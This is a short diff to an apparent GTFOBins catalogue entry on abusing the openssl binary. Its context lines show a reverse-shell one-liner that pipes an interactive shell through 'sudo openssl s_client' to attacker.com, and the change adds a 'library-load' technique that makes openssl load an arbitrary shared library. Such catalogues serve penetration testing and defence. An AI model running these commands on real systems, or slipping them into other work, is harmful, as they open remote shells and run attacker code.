diff --git a/_gtfobins/openssl.md b/_gtfobins/openssl.md index b772eba..2933e1b 100644 --- a/_gtfobins/openssl.md +++ b/_gtfobins/openssl.md @@ -79,4 +79,6 @@ functions: RHOST=attacker.com RPORT=12345 mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s + library-load: + - code: openssl req -engine ./lib.so ---